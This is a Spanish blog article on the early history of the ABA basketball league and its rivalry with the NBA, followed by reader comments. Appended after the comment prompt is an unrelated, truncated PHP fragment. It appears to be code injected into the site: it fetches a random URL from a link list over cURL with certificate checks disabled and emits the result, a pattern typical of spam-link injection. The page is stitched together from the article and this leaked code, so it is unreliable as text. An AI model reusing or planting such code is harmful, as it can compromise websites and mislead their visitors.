ABA: Historia del hermano menor de la NBA (I)

24 de February de 2010 por Sergio
Artículo 5 de 9 de la serie Historia de la NBA

Entre la hegemonía de los Celtics a comienzos y mediados de los años 60 y el resurgimiento que experimentó la competición en los años 80 de la mano de Bird y Magic, la liga sufrió una leve caída en cuanto a seguimiento. Es simbólico recordar que en las 10 temporadas correspondientes a la década de los 70, tan solo Boston y Knicks (dos de las franquicias originales de la liga) conquistaron más de un campeonato, hecho que refleja la ausencia de un claro dominador, al contrario que en décadas anteriores y posteriores. No podemos hablar de un equipo con una hegemonía como la de los Minneapolis Lakers en los 50, Celtics en los 60, Celtics y Lakers en los 80, Bulls en los 90 o Spurs y Lakers de nuevo en esta década que acabamos de abandonar. Durante este ligero paso atrás de la competición surgió la American Basketball Association, fundada un 1 de Febrero de 1967 por el promotor Dennis Murphy junto a Gary Davidson, posteriores ideólogos de otra liga dentro de las competiciones americanas, la World Hockey League.

Esta liga nació con la idea de situarse como una competición paralela a la NBA que aprovechara la evidente decadencia que sufría esta. Una de las principales atracciones era la posibilidad de fundación de una nueva franquicia por la mitad de dinero de lo que costaba el mismo proceso en la NBA, oferta que, en un principio, atrajo a numerosos inversores.

Desde el principio se instauró un estilo de juego mucho más ofensivo, incluidas numerosas modificaciones del reglamento. Desde las diferentes medidas de las zonas del campo hasta la implantación del, por muchos de nosotros amado, balón tricolor. No podemos olvidar que siempre se caracterizaron por una política innovadora y diferente a los conceptos de la NBA. Las posesiones eran de 30 segundos, fue la primera competición donde se instauró la línea de tres puntos, la primera en contar con un concurso de matesEn algunos casos la competición se volvía mucho mas regional, con algunas franquicias disputando buena parte de sus partidos en áreas muy cercanas al lugar donde estaban instauradas. A su vez, la ABA apostó por extender la liga a regiones del sur de EEUU, hasta ahora olvidadas por la NBA, que apostaba por equipos del centro y norte del país. Obviamente, este estilo novedoso y ofensivo, a pesar de no triunfar en un principio, fue robando seguidores de forma constante a la más antigua competición. Sin embargo, la falta de cobertura televisiva y financiación externa fue una grave lacra que acabó costándole a la liga su fusión con su más acérrima rival en 1976.

La NBA, en un principio no prestaba mucha atención a la potencial posibilidad del robo de aficionados por parte de la recién creada ABA puesto que el baloncesto, aún entonces, era considerado el tercer espectaculo deportivo tras el béisbol y el fútbol americano. La NBA empezó a darse cuenta de la competencia que se estaba creando cuando se empezó a tomar a la ABA como “la liga de los chicos malos”. Hay que recordar que algunas de las principales figuras de la American Association League como Connie Hawkins, Doug Moe y Roger Brown fueron vetadas al intentar ingresar en la NBA cuando sus números fueron ligados a apuestas ilegales en sus etapas en el insituto. Como todos sabemos, a los aficionados, aparte de los campeones, nos gustan los jugadores físicos, las luchas (deportivamente hablando) y el deporte espectáculo. Esos factores, que comenzaban a caracterizar a la nueva liga, acabaron por llamar la atención de los dirigentes de la NBA y crearon un pequeño ambiente de nerviosismo.

Curiosamente, algunos de los más grandes jugadores de la NBA terminaron por ocupar cargos de importancia en la recién nacida liga, como George Mikan, primer comisionado y DeBusschere, última persona en ocupar el mismo cargo.

Al igual que en la competición paralela, durante los 9 campeonatos disputados no se llegó a establecer ninguna dinastía, siendo los Pacers, con tres títulos, y los Nets, con dos, los únicos equipos capaces de ganar más de una vez la liga. Muchos jugadores de la ABA dejaron su impronta en aquella liga, siendo a continuación grandes figuras, e incluso campeones, en la competición resultante de la fusión de ambas en 1976. Jugadores como Dan Issel, Ralph Simpsons, Artis Gilmore, Rick Barry, George Gervin, Connie Hawkins, Moses Malone, David Thompson, Spencer Haywood y George McGinnis, todos incluidos en la lista de grandes jugadores históricos de la liga, también consiguieron grandes metas en la NBA. Pero si a algún jugador en especial puede deberle la ABA la ligera explosión sufrida y su supervivencia durante más años de los que, en un principio, parecía estar destinada, ese era Julius Erving. Si en la NBA los principales causantes de la expansión han sido Bird, Magic y Jordan, el mesías de la ABA fue Dr.J. Desde luego, aquellos años en los que las ligas universitarias y colegiales no permitían el mate solo consiguieron que cuando Erving iniciase su andadura nos deleitara con todos aquellos movimientos y mates que le habían sido vetados. La prohibición genera deseo.

Comenta

6 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Me llama la atención que asocies la ausencia de un dominador con “pasos atrás” o con la decadencia de la liga. Precísamente terminaba de concluir (sufrir) el dominio insano de los Celtics, y que algunos apuntan como un factor que perjudicó el interés por la liga.
    No dudo que la se pasó por un grave momento de crisis en ese momento, lo que sí dudo es que ocurriera por la ausencia de un dominador.

    Por cierto, Sergio… todavía no me has dicho si acerté la pregunta que lanzaste el otro día. Para un trivial en el que me dejáis participar…

      Citar

  2. Txusma dice:
    #2

    Ese mate de Julius Erving desde el tiro libre es una de esas imágenes que me vienen rápidamente a la cabeza cuando se habla de basquet americano… Tengo más algún día habrá que reunirlas todas.

      Citar

  3. TheDeerHunter dice:
    #3

    Juer… y la de la canasta a aro pasado por detrás del tablero es una de las más repetidas del mundo.
    Casi diría que cansa un poco…

      Citar

  4. Txusma dice:
    #4

    Esa era la otra que tenía en mente de Julius Erving pero ya era con los Sixers en la NBA, no?

      Citar

  5. Viva_Dirk dice:
    #5

    La ABA mola, esas pintas eran tremendas. Y como ha dicho Sergio algunos de los mas grandes llegaron desde ella.

    La canasta que comenta Deer si que la repiten mucho, pero es que fue algo completamente nuevo ¿no?

      Citar

  6. Álvaro dice:
    #6

    Enlazo tu artículo a mi blog,

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>